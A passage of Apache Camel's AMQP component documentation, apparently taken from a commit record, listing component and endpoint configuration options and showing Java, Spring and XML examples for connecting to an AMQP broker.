SimpleAsyncTaskExecutor) or ThreadPool (uses Spring's ThreadPoolTaskExecutor with optimal values - cached threadpool-like). If not set, it defaults to the previous behaviour, which uses a cached thread pool for consumer endpoints and SimpleAsync for reply consumers. The use of ThreadPool is recommended to reduce thread trash in elastic configurations with dynamically increasing and decreasing concurrent consumers. | | DefaultTaskExecutor Type\n| *jmsKeyFormatStrategy* (advanced) | Pluggable strategy for encoding and decoding JMS keys so they can be compliant with the JMS specification. Camel provides two implementations out of the box: default and passthrough. The default strategy will safely marshal dots and hyphens (. and -). The passthrough strategy leaves the key as is. Can be used for JMS brokers which do not care whether JMS header keys contain illegal characters. You can provide your own implementation of the org.apache.camel.component.jms.JmsKeyFormatStrategy and refer to it using the notation. | | JmsKeyFormatStrategy\n| *allowAdditionalHeaders* (producer) | This option is used to allow additional headers which may have values that are invalid according to JMS specification. For example some message systems such as WMQ do this with header names using prefix JMS_IBM_MQMD_ containing values with byte array or other invalid types. You can specify multiple header names separated by comma, and use as suffix for wildcard matching. | | String\n| *queueBrowseStrategy* (advanced) | To use a custom QueueBrowseStrategy when browsing queues | | QueueBrowseStrategy\n| *messageCreatedStrategy* (advanced) | To use the given MessageCreatedStrategy which are invoked when Camel creates new instances of javax.jms.Message objects when Camel is sending a JMS message. | | MessageCreatedStrategy\n| *waitForProvision CorrelationToBeUpdated Counter* (advanced) | Number of times to wait for provisional correlation id to be updated to the actual correlation id when doing request\/reply over JMS and when the option useMessageIDAsCorrelationID is enabled. | 50 | int\n| *waitForProvision CorrelationToBeUpdated ThreadSleepingTime* (advanced) | Interval in millis to sleep each time while waiting for provisional correlation id to be updated. | 100 | long\n| *correlationProperty* (producer) | Use this JMS property to correlate messages in InOut exchange pattern (request-reply) instead of JMSCorrelationID property. This allows you to exchange messages with systems that do not correlate messages using JMSCorrelationID JMS property. If used JMSCorrelationID will not be used or set by Camel. The value of here named property will be generated if not supplied in the header of the message under the same name. | | String\n| *subscriptionDurable* (consumer) | Set whether to make the subscription durable. The durable subscription name to be used can be specified through the subscriptionName property. Default is false. Set this to true to register a durable subscription, typically in combination with a subscriptionName value (unless your message listener class name is good enough as subscription name). Only makes sense when listening to a topic (pub-sub domain), therefore this method switches the pubSubDomain flag as well. | false | boolean\n| *subscriptionShared* (consumer) | Set whether to make the subscription shared. The shared subscription name to be used can be specified through the subscriptionName property. Default is false. Set this to true to register a shared subscription, typically in combination with a subscriptionName value (unless your message listener class name is good enough as subscription name). Note that shared subscriptions may also be durable, so this flag can (and often will) be combined with subscriptionDurable as well. Only makes sense when listening to a topic (pub-sub domain), therefore this method switches the pubSubDomain flag as well. Requires a JMS 2.0 compatible message broker. | false | boolean\n| *subscriptionName* (consumer) | Set the name of a subscription to create. To be applied in case of a topic (pub-sub domain) with a shared or durable subscription. The subscription name needs to be unique within this client's JMS client id. Default is the class name of the specified message listener. Note: Only 1 concurrent consumer (which is the default of this message listener container) is allowed for each subscription, except for a shared subscription (which requires JMS 2.0). | | String\n| *streamMessageType Enabled* (producer) | Sets whether StreamMessage type is enabled or not. Message payloads of streaming kind such as files, InputStream, etc will either by sent as BytesMessage or StreamMessage. This option controls which kind will be used. By default BytesMessage is used which enforces the entire message payload to be read into memory. By enabling this option the message payload is read into memory in chunks and each chunk is then written to the StreamMessage until no more data. | false | boolean\n| *headerFilterStrategy* (filter) | To use a custom org.apache.camel.spi.HeaderFilterStrategy to filter header to and from Camel message. | | HeaderFilterStrategy\n| *resolveProperty Placeholders* (advanced) | Whether the component should resolve property placeholders on itself when starting. Only properties which are of String type can use property placeholders. | true | boolean\n|===\n\/\/ component options: END\n\n\n\n\n\n\n\n\/\/ endpoint options: START\nThe AMQP endpoint is configured using URI syntax:\n\n----\namqp:destinationType:destinationName\n----\n\nwith the following path and query parameters:\n\n==== Path Parameters (2 parameters):\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *destinationType* | The kind of destination to use | queue | String\n| *destinationName* | *Required* Name of the queue or topic to use as destination | | String\n|===\n\n==== Query Parameters (90 parameters):\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *clientId* (common) | Sets the JMS client ID to use. Note that this value, if specified, must be unique and can only be used by a single JMS connection instance. It is typically only required for durable topic subscriptions. If using Apache ActiveMQ you may prefer to use Virtual Topics instead. | | String\n| *connectionFactory* (common) | The connection factory to be use. A connection factory must be configured either on the component or endpoint. | | ConnectionFactory\n| *disableReplyTo* (common) | Specifies whether Camel ignores the JMSReplyTo header in messages. If true, Camel does not send a reply back to the destination specified in the JMSReplyTo header. You can use this option if you want Camel to consume from a route and you do not want Camel to automatically send back a reply message because another component in your code handles the reply message. You can also use this option if you want to use Camel as a proxy between different message brokers and you want to route message from one system to another. | false | boolean\n| *durableSubscriptionName* (common) | The durable subscriber name for specifying durable topic subscriptions. The clientId option must be configured as well. | | String\n| *jmsMessageType* (common) | Allows you to force the use of a specific javax.jms.Message implementation for sending JMS messages. Possible values are: Bytes, Map, Object, Stream, Text. By default, Camel would determine which JMS message type to use from the In body type. This option allows you to specify it. | | JmsMessageType\n| *testConnectionOnStartup* (common) | Specifies whether to test the connection on startup. This ensures that when Camel starts that all the JMS consumers have a valid connection to the JMS broker. If a connection cannot be granted then Camel throws an exception on startup. This ensures that Camel is not started with failed connections. The JMS producers is tested as well. | false | boolean\n| *acknowledgementModeName* (consumer) | The JMS acknowledgement name, which is one of: SESSION_TRANSACTED, CLIENT_ACKNOWLEDGE, AUTO_ACKNOWLEDGE, DUPS_OK_ACKNOWLEDGE | AUTO_ ACKNOWLEDGE | String\n| *asyncConsumer* (consumer) | Whether the JmsConsumer processes the Exchange asynchronously. If enabled then the JmsConsumer may pickup the next message from the JMS queue, while the previous message is being processed asynchronously (by the Asynchronous Routing Engine). This means that messages may be processed not 100% strictly in order. If disabled (as default) then the Exchange is fully processed before the JmsConsumer will pickup the next message from the JMS queue. Note if transacted has been enabled, then asyncConsumer=true does not run asynchronously, as transaction must be executed synchronously (Camel 3.0 may support async transactions). | false | boolean\n| *autoStartup* (consumer) | Specifies whether the consumer container should auto-startup. | true | boolean\n| *bridgeErrorHandler* (consumer) | Allows for bridging the consumer to the Camel routing Error Handler, which mean any exceptions occurred while the consumer is trying to pickup incoming messages, or the likes, will now be processed as a message and handled by the routing Error Handler. By default the consumer will use the org.apache.camel.spi.ExceptionHandler to deal with exceptions, that will be logged at WARN or ERROR level and ignored. | false | boolean\n| *cacheLevel* (consumer) | Sets the cache level by ID for the underlying JMS resources. See cacheLevelName option for more details. | | int\n| *cacheLevelName* (consumer) | Sets the cache level by name for the underlying JMS resources. Possible values are: CACHE_AUTO, CACHE_CONNECTION, CACHE_CONSUMER, CACHE_NONE, and CACHE_SESSION. The default setting is CACHE_AUTO. See the Spring documentation and Transactions Cache Levels for more information. | CACHE_AUTO | String\n| *concurrentConsumers* (consumer) | Specifies the default number of concurrent consumers when consuming from JMS (not for request\/reply over JMS). See also the maxMessagesPerTask option to control dynamic scaling up\/down of threads. When doing request\/reply over JMS then the option replyToConcurrentConsumers is used to control number of concurrent consumers on the reply message listener. | 1 | int\n| *maxConcurrentConsumers* (consumer) | Specifies the maximum number of concurrent consumers when consuming from JMS (not for request\/reply over JMS). See also the maxMessagesPerTask option to control dynamic scaling up\/down of threads. When doing request\/reply over JMS then the option replyToMaxConcurrentConsumers is used to control number of concurrent consumers on the reply message listener. | | int\n| *replyTo* (consumer) | Provides an explicit ReplyTo destination, which overrides any incoming value of Message.getJMSReplyTo(). | | String\n| *replyToDeliveryPersistent* (consumer) | Specifies whether to use persistent delivery by default for replies. | true | boolean\n| *selector* (consumer) | Sets the JMS selector to use | | String\n| *subscriptionDurable* (consumer) | Set whether to make the subscription durable. The durable subscription name to be used can be specified through the subscriptionName property. Default is false. Set this to true to register a durable subscription, typically in combination with a subscriptionName value (unless your message listener class name is good enough as subscription name). Only makes sense when listening to a topic (pub-sub domain), therefore this method switches the pubSubDomain flag as well. | false | boolean\n| *subscriptionName* (consumer) | Set the name of a subscription to create. To be applied in case of a topic (pub-sub domain) with a shared or durable subscription. The subscription name needs to be unique within this client's JMS client id. Default is the class name of the specified message listener. Note: Only 1 concurrent consumer (which is the default of this message listener container) is allowed for each subscription, except for a shared subscription (which requires JMS 2.0). | | String\n| *subscriptionShared* (consumer) | Set whether to make the subscription shared. The shared subscription name to be used can be specified through the subscriptionName property. Default is false. Set this to true to register a shared subscription, typically in combination with a subscriptionName value (unless your message listener class name is good enough as subscription name). Note that shared subscriptions may also be durable, so this flag can (and often will) be combined with subscriptionDurable as well. Only makes sense when listening to a topic (pub-sub domain), therefore this method switches the pubSubDomain flag as well. Requires a JMS 2.0 compatible message broker. | false | boolean\n| *acceptMessagesWhileStopping* (consumer) | Specifies whether the consumer accept messages while it is stopping. You may consider enabling this option, if you start and stop JMS routes at runtime, while there are still messages enqueued on the queue. If this option is false, and you stop the JMS route, then messages may be rejected, and the JMS broker would have to attempt redeliveries, which yet again may be rejected, and eventually the message may be moved at a dead letter queue on the JMS broker. To avoid this its recommended to enable this option. | false | boolean\n| *allowReplyManagerQuickStop* (consumer) | Whether the DefaultMessageListenerContainer used in the reply managers for request-reply messaging allow the DefaultMessageListenerContainer.runningAllowed flag to quick stop in case JmsConfigurationisAcceptMessagesWhileStopping is enabled, and org.apache.camel.CamelContext is currently being stopped. This quick stop ability is enabled by default in the regular JMS consumers but to enable for reply managers you must enable this flag. | false | boolean\n| *consumerType* (consumer) | The consumer type to use, which can be one of: Simple, Default, or Custom. The consumer type determines which Spring JMS listener to use. Default will use org.springframework.jms.listener.DefaultMessageListenerContainer, Simple will use org.springframework.jms.listener.SimpleMessageListenerContainer. When Custom is specified, the MessageListenerContainerFactory defined by the messageListenerContainerFactory option will determine what org.springframework.jms.listener.AbstractMessageListenerContainer to use. | Default | ConsumerType\n| *defaultTaskExecutorType* (consumer) | Specifies what default TaskExecutor type to use in the DefaultMessageListenerContainer, for both consumer endpoints and the ReplyTo consumer of producer endpoints. Possible values: SimpleAsync (uses Spring's SimpleAsyncTaskExecutor) or ThreadPool (uses Spring's ThreadPoolTaskExecutor with optimal values - cached threadpool-like). If not set, it defaults to the previous behaviour, which uses a cached thread pool for consumer endpoints and SimpleAsync for reply consumers. The use of ThreadPool is recommended to reduce thread trash in elastic configurations with dynamically increasing and decreasing concurrent consumers. | | DefaultTaskExecutor Type\n| *eagerLoadingOfProperties* (consumer) | Enables eager loading of JMS properties and payload as soon as a message is loaded which generally is inefficient as the JMS properties may not be required but sometimes can catch early any issues with the underlying JMS provider and the use of JMS properties | false | boolean\n| *exceptionHandler* (consumer) | To let the consumer use a custom ExceptionHandler. Notice if the option bridgeErrorHandler is enabled then this options is not in use. By default the consumer will deal with exceptions, that will be logged at WARN or ERROR level and ignored. | | ExceptionHandler\n| *exchangePattern* (consumer) | Sets the exchange pattern when the consumer creates an exchange. | | ExchangePattern\n| *exposeListenerSession* (consumer) | Specifies whether the listener session should be exposed when consuming messages. | false | boolean\n| *replyToSameDestination Allowed* (consumer) | Whether a JMS consumer is allowed to send a reply message to the same destination that the consumer is using to consume from. This prevents an endless loop by consuming and sending back the same message to itself. | false | boolean\n| *taskExecutor* (consumer) | Allows you to specify a custom task executor for consuming messages. | | TaskExecutor\n| *deliveryMode* (producer) | Specifies the delivery mode to be used. Possibles values are those defined by javax.jms.DeliveryMode. NON_PERSISTENT = 1 and PERSISTENT = 2. | | Integer\n| *deliveryPersistent* (producer) | Specifies whether persistent delivery is used by default. | true | boolean\n| *explicitQosEnabled* (producer) | Set if the deliveryMode, priority or timeToLive qualities of service should be used when sending messages. This option is based on Spring's JmsTemplate. The deliveryMode, priority and timeToLive options are applied to the current endpoint. This contrasts with the preserveMessageQos option, which operates at message granularity, reading QoS properties exclusively from the Camel In message headers. | false | Boolean\n| *preserveMessageQos* (producer) | Set to true, if you want to send message using the QoS settings specified on the message, instead of the QoS settings on the JMS endpoint. The following three headers are considered JMSPriority, JMSDeliveryMode, and JMSExpiration. You can provide all or only some of them. If not provided, Camel will fall back to use the values from the endpoint instead. So, when using this option, the headers override the values from the endpoint. The explicitQosEnabled option, by contrast, will only use options set on the endpoint, and not values from the message header. | false | boolean\n| *priority* (producer) | Values greater than 1 specify the message priority when sending (where 0 is the lowest priority and 9 is the highest). The explicitQosEnabled option must also be enabled in order for this option to have any effect. | 4 | int\n| *replyToConcurrentConsumers* (producer) | Specifies the default number of concurrent consumers when doing request\/reply over JMS. See also the maxMessagesPerTask option to control dynamic scaling up\/down of threads. | 1 | int\n| *replyToMaxConcurrent Consumers* (producer) | Specifies the maximum number of concurrent consumers when using request\/reply over JMS. See also the maxMessagesPerTask option to control dynamic scaling up\/down of threads. | | int\n| *replyToOnTimeoutMax ConcurrentConsumers* (producer) | Specifies the maximum number of concurrent consumers for continue routing when timeout occurred when using request\/reply over JMS. | 1 | int\n| *replyToOverride* (producer) | Provides an explicit ReplyTo destination in the JMS message, which overrides the setting of replyTo. It is useful if you want to forward the message to a remote Queue and receive the reply message from the ReplyTo destination. | | String\n| *replyToType* (producer) | Allows for explicitly specifying which kind of strategy to use for replyTo queues when doing request\/reply over JMS. Possible values are: Temporary, Shared, or Exclusive. By default Camel will use temporary queues. However if replyTo has been configured, then Shared is used by default. This option allows you to use exclusive queues instead of shared ones. See Camel JMS documentation for more details, and especially the notes about the implications if running in a clustered environment, and the fact that Shared reply queues has lower performance than its alternatives Temporary and Exclusive. | | ReplyToType\n| *requestTimeout* (producer) | The timeout for waiting for a reply when using the InOut Exchange Pattern (in milliseconds). The default is 20 seconds. You can include the header CamelJmsRequestTimeout to override this endpoint configured timeout value, and thus have per message individual timeout values. See also the requestTimeoutCheckerInterval option. | 20000 | long\n| *timeToLive* (producer) | When sending messages, specifies the time-to-live of the message (in milliseconds). | -1 | long\n| *allowAdditionalHeaders* (producer) | This option is used to allow additional headers which may have values that are invalid according to JMS specification. For example some message systems such as WMQ do this with header names using prefix JMS_IBM_MQMD_ containing values with byte array or other invalid types. You can specify multiple header names separated by comma, and use as suffix for wildcard matching. | | String\n| *allowNullBody* (producer) | Whether to allow sending messages with no body. If this option is false and the message body is null, then an JMSException is thrown. | true | boolean\n| *alwaysCopyMessage* (producer) | If true, Camel will always make a JMS message copy of the message when it is passed to the producer for sending. Copying the message is needed in some situations, such as when a replyToDestinationSelectorName is set (incidentally, Camel will set the alwaysCopyMessage option to true, if a replyToDestinationSelectorName is set) | false | boolean\n| *correlationProperty* (producer) | When using InOut exchange pattern use this JMS property instead of JMSCorrelationID JMS property to correlate messages. If set messages will be correlated solely on the value of this property JMSCorrelationID property will be ignored and not set by Camel. | | String\n| *disableTimeToLive* (producer) | Use this option to force disabling time to live. For example when you do request\/reply over JMS, then Camel will by default use the requestTimeout value as time to live on the message being sent. The problem is that the sender and receiver systems have to have their clocks synchronized, so they are in sync. This is not always so easy to archive. So you can use disableTimeToLive=true to not set a time to live value on the sent message. Then the message will not expire on the receiver system. See below in section About time to live for more details. | false | boolean\n| *forceSendOriginalMessage* (producer) | When using mapJmsMessage=false Camel will create a new JMS message to send to a new JMS destination if you touch the headers (get or set) during the route. Set this option to true to force Camel to send the original JMS message that was received. | false | boolean\n| *includeSentJMSMessageID* (producer) | Only applicable when sending to JMS destination using InOnly (eg fire and forget). Enabling this option will enrich the Camel Exchange with the actual JMSMessageID that was used by the JMS client when the message was sent to the JMS destination. | false | boolean\n| *replyToCacheLevelName* (producer) | Sets the cache level by name for the reply consumer when doing request\/reply over JMS. This option only applies when using fixed reply queues (not temporary). Camel will by default use: CACHE_CONSUMER for exclusive or shared w\/ replyToSelectorName. And CACHE_SESSION for shared without replyToSelectorName. Some JMS brokers such as IBM WebSphere may require to set the replyToCacheLevelName=CACHE_NONE to work. Note: If using temporary queues then CACHE_NONE is not allowed, and you must use a higher value such as CACHE_CONSUMER or CACHE_SESSION. | | String\n| *replyToDestinationSelector Name* (producer) | Sets the JMS Selector using the fixed name to be used so you can filter out your own replies from the others when using a shared queue (that is, if you are not using a temporary reply queue). | | String\n| *streamMessageTypeEnabled* (producer) | Sets whether StreamMessage type is enabled or not. Message payloads of streaming kind such as files, InputStream, etc will either by sent as BytesMessage or StreamMessage. This option controls which kind will be used. By default BytesMessage is used which enforces the entire message payload to be read into memory. By enabling this option the message payload is read into memory in chunks and each chunk is then written to the StreamMessage until no more data. | false | boolean\n| *allowSerializedHeaders* (advanced) | Controls whether or not to include serialized headers. Applies only when transferExchange is true. This requires that the objects are serializable. Camel will exclude any non-serializable objects and log it at WARN level. | false | boolean\n| *asyncStartListener* (advanced) | Whether to startup the JmsConsumer message listener asynchronously, when starting a route. For example if a JmsConsumer cannot get a connection to a remote JMS broker, then it may block while retrying and\/or failover. This will cause Camel to block while starting routes. By setting this option to true, you will let routes startup, while the JmsConsumer connects to the JMS broker using a dedicated thread in asynchronous mode. If this option is used, then beware that if the connection could not be established, then an exception is logged at WARN level, and the consumer will not be able to receive messages; You can then restart the route to retry. | false | boolean\n| *asyncStopListener* (advanced) | Whether to stop the JmsConsumer message listener asynchronously, when stopping a route. | false | boolean\n| *destinationResolver* (advanced) | A pluggable org.springframework.jms.support.destination.DestinationResolver that allows you to use your own resolver (for example, to lookup the real destination in a JNDI registry). | | DestinationResolver\n| *errorHandler* (advanced) | Specifies a org.springframework.util.ErrorHandler to be invoked in case of any uncaught exceptions thrown while processing a Message. By default these exceptions will be logged at the WARN level, if no errorHandler has been configured. You can configure logging level and whether stack traces should be logged using errorHandlerLoggingLevel and errorHandlerLogStackTrace options. This makes it much easier to configure, than having to code a custom errorHandler. | | ErrorHandler\n| *exceptionListener* (advanced) | Specifies the JMS Exception Listener that is to be notified of any underlying JMS exceptions. | | ExceptionListener\n| *headerFilterStrategy* (advanced) | To use a custom HeaderFilterStrategy to filter header to and from Camel message. | | HeaderFilterStrategy\n| *idleConsumerLimit* (advanced) | Specify the limit for the number of consumers that are allowed to be idle at any given time. | 1 | int\n| *idleTaskExecutionLimit* (advanced) | Specifies the limit for idle executions of a receive task, not having received any message within its execution. If this limit is reached, the task will shut down and leave receiving to other executing tasks (in the case of dynamic scheduling; see the maxConcurrentConsumers setting). There is additional doc available from Spring. | 1 | int\n| *includeAllJMSXProperties* (advanced) | Whether to include all JMSXxxx properties when mapping from JMS to Camel Message. Setting this to true will include properties such as JMSXAppID, and JMSXUserID etc. Note: If you are using a custom headerFilterStrategy then this option does not apply. | false | boolean\n| *jmsKeyFormatStrategy* (advanced) | Pluggable strategy for encoding and decoding JMS keys so they can be compliant with the JMS specification. Camel provides two implementations out of the box: default and passthrough. The default strategy will safely marshal dots and hyphens (. and -). The passthrough strategy leaves the key as is. Can be used for JMS brokers which do not care whether JMS header keys contain illegal characters. You can provide your own implementation of the org.apache.camel.component.jms.JmsKeyFormatStrategy and refer to it using the notation. | | String\n| *mapJmsMessage* (advanced) | Specifies whether Camel should auto map the received JMS message to a suited payload type, such as javax.jms.TextMessage to a String etc. | true | boolean\n| *maxMessagesPerTask* (advanced) | The number of messages per task. -1 is unlimited. If you use a range for concurrent consumers (eg min max), then this option can be used to set a value to eg 100 to control how fast the consumers will shrink when less work is required. | -1 | int\n| *messageConverter* (advanced) | To use a custom Spring org.springframework.jms.support.converter.MessageConverter so you can be in control how to map to\/from a javax.jms.Message. | | MessageConverter\n| *messageCreatedStrategy* (advanced) | To use the given MessageCreatedStrategy which are invoked when Camel creates new instances of javax.jms.Message objects when Camel is sending a JMS message. | | MessageCreatedStrategy\n| *messageIdEnabled* (advanced) | When sending, specifies whether message IDs should be added. This is just an hint to the JMS broker.If the JMS provider accepts this hint, these messages must have the message ID set to null; if the provider ignores the hint, the message ID must be set to its normal unique value | true | boolean\n| *messageListenerContainer Factory* (advanced) | Registry ID of the MessageListenerContainerFactory used to determine what org.springframework.jms.listener.AbstractMessageListenerContainer to use to consume messages. Setting this will automatically set consumerType to Custom. | | MessageListener ContainerFactory\n| *messageTimestampEnabled* (advanced) | Specifies whether timestamps should be enabled by default on sending messages. This is just an hint to the JMS broker.If the JMS provider accepts this hint, these messages must have the timestamp set to zero; if the provider ignores the hint the timestamp must be set to its normal value | true | boolean\n| *pubSubNoLocal* (advanced) | Specifies whether to inhibit the delivery of messages published by its own connection. | false | boolean\n| *receiveTimeout* (advanced) | The timeout for receiving messages (in milliseconds). | 1000 | long\n| *recoveryInterval* (advanced) | Specifies the interval between recovery attempts, i.e. when a connection is being refreshed, in milliseconds. The default is 5000 ms, that is, 5 seconds. | 5000 | long\n| *requestTimeoutChecker Interval* (advanced) | Configures how often Camel should check for timed out Exchanges when doing request\/reply over JMS. By default Camel checks once per second. But if you must react faster when a timeout occurs, then you can lower this interval, to check more frequently. The timeout is determined by the option requestTimeout. | 1000 | long\n| *synchronous* (advanced) | Sets whether synchronous processing should be strictly used, or Camel is allowed to use asynchronous processing (if supported). | false | boolean\n| *transferException* (advanced) | If enabled and you are using Request Reply messaging (InOut) and an Exchange failed on the consumer side, then the caused Exception will be send back in response as a javax.jms.ObjectMessage. If the client is Camel, the returned Exception is rethrown. This allows you to use Camel JMS as a bridge in your routing - for example, using persistent queues to enable robust routing. Notice that if you also have transferExchange enabled, this option takes precedence. The caught exception is required to be serializable. The original Exception on the consumer side can be wrapped in an outer exception such as org.apache.camel.RuntimeCamelException when returned to the producer. | false | boolean\n| *transferExchange* (advanced) | You can transfer the exchange over the wire instead of just the body and headers. The following fields are transferred: In body, Out body, Fault body, In headers, Out headers, Fault headers, exchange properties, exchange exception. This requires that the objects are serializable. Camel will exclude any non-serializable objects and log it at WARN level. You must enable this option on both the producer and consumer side, so Camel knows the payloads is an Exchange and not a regular payload. | false | boolean\n| *transferFault* (advanced) | If enabled and you are using Request Reply messaging (InOut) and an Exchange failed with a SOAP fault (not exception) on the consumer side, then the fault flag on MessageisFault() will be send back in the response as a JMS header with the key org.apache.camel.component.jms.JmsConstantsJMS_TRANSFER_FAULTJMS_TRANSFER_FAULT. If the client is Camel, the returned fault flag will be set on the link org.apache.camel.MessagesetFault(boolean). You may want to enable this when using Camel components that support faults such as SOAP based such as cxf or spring-ws. | false | boolean\n| *useMessageIDAsCorrelation ID* (advanced) | Specifies whether JMSMessageID should always be used as JMSCorrelationID for InOut messages. | false | boolean\n| *waitForProvisionCorrelation ToBeUpdatedCounter* (advanced) | Number of times to wait for provisional correlation id to be updated to the actual correlation id when doing request\/reply over JMS and when the option useMessageIDAsCorrelationID is enabled. | 50 | int\n| *waitForProvisionCorrelation ToBeUpdatedThreadSleeping Time* (advanced) | Interval in millis to sleep each time while waiting for provisional correlation id to be updated. | 100 | long\n| *errorHandlerLoggingLevel* (logging) | Allows to configure the default errorHandler logging level for logging uncaught exceptions. | WARN | LoggingLevel\n| *errorHandlerLogStackTrace* (logging) | Allows to control whether stacktraces should be logged or not, by the default errorHandler. | true | boolean\n| *password* (security) | Password to use with the ConnectionFactory. You can also configure username\/password directly on the ConnectionFactory. | | String\n| *username* (security) | Username to use with the ConnectionFactory. You can also configure username\/password directly on the ConnectionFactory. | | String\n| *transacted* (transaction) | Specifies whether to use transacted mode | false | boolean\n| *lazyCreateTransaction Manager* (transaction) | If true, Camel will create a JmsTransactionManager, if there is no transactionManager injected when option transacted=true. | true | boolean\n| *transactionManager* (transaction) | The Spring transaction manager to use. | | PlatformTransaction Manager\n| *transactionName* (transaction) | The name of the transaction to use. | | String\n| *transactionTimeout* (transaction) | The timeout value of the transaction (in seconds), if using transacted mode. | -1 | int\n|===\n\/\/ endpoint options: END\n\n\n\n\n### Usage\n\nAs AMQP component is inherited from JMS component, the usage of the\nformer is almost identical to the latter:\n\n*Using AMQP component*\n\n[source,java]\n------------------------------------\n\/\/ Consuming from AMQP queue\nfrom(\"amqp:queue:incoming\").\n to(...);\n\u00a0\n\/\/ Sending message to the AMQP topic\nfrom(...).\n to(\"amqp:topic:notify\");\n------------------------------------\n\n### Configuring AMQP component\n\nStarting from the Camel 2.16.1 you can also use the\n`AMQPComponent#amqp10Component(String connectionURI)` factory method to\nreturn the AMQP 1.0 component with the pre-configured\u00a0topic prefix:\u00a0\n\n*Creating AMQP 1.0 component*\n\n[source,java]\n-----------------------------------------------------------------------------------------\n AMQPComponent amqp = AMQPComponent.amqp10Component(\"amqp:\/\/guest:guest@localhost:5672\");\n-----------------------------------------------------------------------------------------\n\nKeep in mind that starting from the\nCamel\u00a02.17\u00a0the\u00a0`AMQPComponent#amqp10Component(String connectionURI)`\u00a0factory\nmethod has been deprecated on the behalf of the\n`AMQPComponent#amqpComponent(String connectionURI)`:\u00a0\n\n*Creating AMQP 1.0 component*\n\n[source,java]\n--------------------------------------------------------------------------------------------------------\nAMQPComponent amqp = AMQPComponent.amqpComponent(\"amqp:\/\/localhost:5672\");\n\u00a0\nAMQPComponent authorizedAmqp = AMQPComponent.amqpComponent(\"amqp:\/\/localhost:5672\", \"user\", \"password\");\n--------------------------------------------------------------------------------------------------------\n\nStarting from Camel 2.17, in order to automatically configure the AMQP\ncomponent, you can also add an instance\nof\u00a0`org.apache.camel.component.amqp.AMQPConnectionDetails` to the\nregistry. For example for Spring Boot you just have to define\u00a0bean:\n\n*AMQP connection details auto-configuration*\n\n[source,java]\n-------------------------------------------------------------------------------------\n@Bean\nAMQPConnectionDetails amqpConnection() {\n return new AMQPConnectionDetails(\"amqp:\/\/localhost:5672\"); \n}\n\u00a0\n@Bean\nAMQPConnectionDetails securedAmqpConnection() {\n return new AMQPConnectionDetails(\"amqp:\/\/lcoalhost:5672\", \"username\", \"password\"); \n}\n-------------------------------------------------------------------------------------\n\nLikewise, you can also use CDI producer methods when using Camel-CDI\n\n*AMQP connection details auto-configuration for CDI*\n\n[source,java]\n-------------------------------------------------------------------------------------\n@Produces\nAMQPConnectionDetails amqpConnection() {\n return new AMQPConnectionDetails(\"amqp:\/\/localhost:5672\");\n}\n-------------------------------------------------------------------------------------\n\nYou can also rely on the <<properties-component,Camel properties>> to read\nthe AMQP connection details. Factory\nmethod\u00a0`AMQPConnectionDetails.discoverAMQP()`\u00a0attempts to read Camel\nproperties in a Kubernetes-like convention, just as demonstrated on the\nsnippet below:\n\n*AMQP connection details auto-configuration*\n\n[source,java]\n-----------------------------------------------\nexport AMQP_SERVICE_HOST = \"mybroker.com\"\nexport AMQP_SERVICE_PORT = \"6666\"\nexport AMQP_SERVICE_USERNAME = \"username\"\nexport AMQP_SERVICE_PASSWORD = \"password\"\n\u00a0\n...\n\u00a0\n@Bean\nAMQPConnectionDetails amqpConnection() {\n return AMQPConnectionDetails.discoverAMQP(); \n}\n-----------------------------------------------\n\n*Enabling AMQP specific options*\n\nIf you, for example, need to enable `amqp.traceFrames` you can do that by appending the option to your URI, like the following example:\n\n[source,java]\n--------------------------------------------------------------------------------------------------------\nAMQPComponent amqp = AMQPComponent.amqpComponent(\"amqp:\/\/localhost:5672?amqp.traceFrames=true\");\n--------------------------------------------------------------------------------------------------------\n\nFor reference take a look at the https:\/\/qpid.apache.org\/releases\/qpid-jms-0.29.0\/docs\/index.html[QPID JMS client configuration]\n\n### Using topics\n\nTo have using topics working with\u00a0`camel-amqp`\u00a0you need to configure the\ncomponent to use\u00a0`topic:\/\/`\u00a0as topic prefix, as shown below:\n\n[source,java]\n-------------------------------------------------------------------------------------------------------------------------------\n <bean id=\"amqp\" class=\"org.apache.camel.component.amqp.AmqpComponent\">\n <property name=\"connectionFactory\">\n <bean class=\"org.apache.qpid.jms.JmsConnectionFactory\" factory-method=\"createFromURL\">\n <property name=\"remoteURI\" value=\"amqp:\/\/localhost:5672\" \/>\n <property name=\"topicPrefix\" value=\"topic:\/\/\" \/> <!-- only necessary when connecting to ActiveMQ over AMQP 1.0 -->\n <\/bean>\n <\/property>\n <\/bean>\n-------------------------------------------------------------------------------------------------------------------------------\n\nKeep in mind that both\u00a0\u00a0`AMQPComponent#amqpComponent()`\u00a0methods and\n`AMQPConnectionDetails` pre-configure the component with the topic\nprefix, so you don't have to configure it explicitly.\n\n### See Also\n\n* Configuring Camel\n* Component\n* Endpoint\n* Getting Started\n","old_contents":"[[amqp-component]]\n== AMQP Component\n\n*Available as of Camel version 1.2*\n\nThe *amqp:* component supports the http:\/\/www.amqp.org\/[AMQP 1.0\nprotocol] using the JMS Client API of the http:\/\/qpid.apache.org\/[Qpid]\nproject. In case you want to use AMQP 0.9 (in particular RabbitMQ) you\nmight also be interested in the <<rabbitmq-component,Camel RabbitMQ>>\ncomponent. Please keep in mind that prior to the Camel 2.17.0 AMQP\ncomponent supported AMQP 0.9 and above, however since Camel 2.17.0 it\nsupports only AMQP 1.0.\n\nMaven users will need to add the following dependency to their `pom.xml`\nfor this component:\n\n[source,xml]\n------------------------------------------------------------------------------------------------\n<dependency>\n <groupId>org.apache.camel<\/groupId>\n <artifactId>camel-amqp<\/artifactId>\n <version>${camel.version}<\/version> <!-- use the same version as your Camel core version -->\n<\/dependency>\n------------------------------------------------------------------------------------------------\n\n### URI format\n\n[source,java]\n---------------------------------------------\namqp:[queue:|topic:]destinationName[?options]\n---------------------------------------------\n\n### AMQP Options\n\nYou can specify all of the various configuration options of the\nlink:..\/..\/..\/..\/camel-jms\/src\/main\/docs\/readme.html[JMS] component after the destination name.\n\n\n\n\n\/\/ component options: START\nThe AMQP component supports 79 options which are listed below.\n\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *configuration* (advanced) | To use a shared JMS configuration | | JmsConfiguration\n| *acceptMessagesWhile Stopping* (consumer) | Specifies whether the consumer accept messages while it is stopping. You may consider enabling this option, if you start and stop JMS routes at runtime, while there are still messages enqueued on the queue. If this option is false, and you stop the JMS route, then messages may be rejected, 